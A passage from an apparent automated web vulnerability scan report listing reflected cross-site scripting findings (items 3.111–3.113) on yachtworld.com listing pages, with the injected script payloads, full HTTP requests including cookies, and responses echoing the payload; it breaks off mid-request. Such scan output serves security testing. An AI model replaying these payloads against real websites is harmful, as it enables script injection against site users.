Set-Cookie: VIEWED_BOATS_STORE=2255088%5B%25%5D32%27+Regulator+32FS+Center+Console+Loaded%21%5B%25%5DUSD%26nbsp%3B89%2C900%5B%25%5DFort+Lauderdale%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F5%2F5%2F0%2F2255088_1_mini.jpg%3F1250865908000%5B%25%5D%2Fboats%2F2004%2FRegulator-32FS-Center-Console-Loaded%2521-2255088%2FFort-Lauderdale%2FFL%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:04:41 GMT
Set-Cookie: VIEWED_BOATS_STORE=2255088%5B%25%5D32%27+Regulator+32FS+Center+Console+Loaded%21%5B%25%5DUSD%26nbsp%3B89%2C900%5B%25%5DFort+Lauderdale%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F5%2F5%2F0%2F2255088_1_mini.jpg%3F1250865908000%5B%25%5D%2Fboats%2F2004%2FRegulator-32FS-Center-Console-Loaded%2521-2255088%2FFort-Lauderdale%2FFL%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html lang="en-US">
<head>


               <t
...[SNIP]...
ref="/core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=2255088&boat_id=2255088&back=/core/boats/2004/Regulator-32fs-Center-Console-Loaded!-2255088/Fort-Lauderdale/FLeb59c"><script>alert(1)</script>7529dd0e55/United-States&boat_id=2255088">
...[SNIP]...

3.111. http://www.yachtworld.com/boats/2004/Regulator-32fs-Center-Console-Loaded!-2255088/Fort-Lauderdale/FL/United-States [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yachtworld.com
Path:   /boats/2004/Regulator-32fs-Center-Console-Loaded!-2255088/Fort-Lauderdale/FL/United-States

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1d3f"><script>alert(1)</script>4f5ae1f7ad8 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2004/Regulator-32fs-Center-Console-Loaded!-2255088/Fort-Lauderdale/FL/United-Statesc1d3f"><script>alert(1)</script>4f5ae1f7ad8 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; 
VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:05:17 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Mon, 24 Jan 2011 14:45:25 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2255088%5B%25%5D32%27+Regulator+32FS+Center+Console+Loaded%21%5B%25%5DUSD%26nbsp%3B89%2C900%5B%25%5DFort+Lauderdale%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F5%2F5%2F0%2F2255088_1_mini.jpg%3F1250865908000%5B%25%5D%2Fboats%2F2004%2FRegulator-32FS-Center-Console-Loaded%2521-2255088%2FFort-Lauderdale%2FFL%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:05:16 GMT
Set-Cookie: VIEWED_BOATS_STORE=2255088%5B%25%5D32%27+Regulator+32FS+Center+Console+Loaded%21%5B%25%5DUSD%26nbsp%3B89%2C900%5B%25%5DFort+Lauderdale%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F5%2F5%2F0%2F2255088_1_mini.jpg%3F1250865908000%5B%25%5D%2Fboats%2F2004%2FRegulator-32FS-Center-Console-Loaded%2521-2255088%2FFort-Lauderdale%2FFL%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html lang="en-US">
<head>


               <t
...[SNIP]...
ting/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=2255088&boat_id=2255088&back=/core/boats/2004/Regulator-32fs-Center-Console-Loaded!-2255088/Fort-Lauderdale/FL/United-Statesc1d3f"><script>alert(1)</script>4f5ae1f7ad8&boat_id=2255088">
...[SNIP]...

3.112. http://www.yachtworld.com/boats/2004/Regulator-32fs-Center-Console-Loaded!-2255088/Fort-Lauderdale/FL/United-States [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yachtworld.com
Path:   /boats/2004/Regulator-32fs-Center-Console-Loaded!-2255088/Fort-Lauderdale/FL/United-States

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 588f2"><script>alert(1)</script>9c458a9cc4e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2004/Regulator-32fs-Center-Console-Loaded!-2255088/Fort-Lauderdale/FL/United-States?588f2"><script>alert(1)</script>9c458a9cc4e=1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; 
VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:03:52 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Mon, 24 Jan 2011 14:45:25 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2255088%5B%25%5D32%27+Regulator+32FS+Center+Console+Loaded%21%5B%25%5DUSD%26nbsp%3B89%2C900%5B%25%5DFort+Lauderdale%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F5%2F5%2F0%2F2255088_1_mini.jpg%3F1250865908000%5B%25%5D%2Fboats%2F2004%2FRegulator-32FS-Center-Console-Loaded%2521-2255088%2FFort-Lauderdale%2FFL%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:03:52 GMT
Set-Cookie: VIEWED_BOATS_STORE=2255088%5B%25%5D32%27+Regulator+32FS+Center+Console+Loaded%21%5B%25%5DUSD%26nbsp%3B89%2C900%5B%25%5DFort+Lauderdale%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F5%2F5%2F0%2F2255088_1_mini.jpg%3F1250865908000%5B%25%5D%2Fboats%2F2004%2FRegulator-32FS-Center-Console-Loaded%2521-2255088%2FFort-Lauderdale%2FFL%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html lang="en-US">
<head>


               <t
...[SNIP]...
<a rel="nofollow" href="/core/listing/photoGallery.jsp?slim=quick&588f2"><script>alert(1)</script>9c458a9cc4e=1&currency=USD&units=Feet&seo=0&checked_boats=2255088&boat_id=2255088&back=/core/boats/2004/Regulator-32fs-Center-Console-Loaded!-2255088/Fort-Lauderdale/FL/United-States&boat_id=2255088">
...[SNIP]...

3.113. http://www.yachtworld.com/boats/2005/Regulator-32-Forward-Seating-2237772/Parkton/MD/United-States [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yachtworld.com
Path:   /boats/2005/Regulator-32-Forward-Seating-2237772/Parkton/MD/United-States

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ac7d"><script>alert(1)</script>cc630271c5d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2005/Regulator-32-Forward-Seating-2237772/Parkton9ac7d"><script>alert(1)</script>cc630271c5d/MD/United-States HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
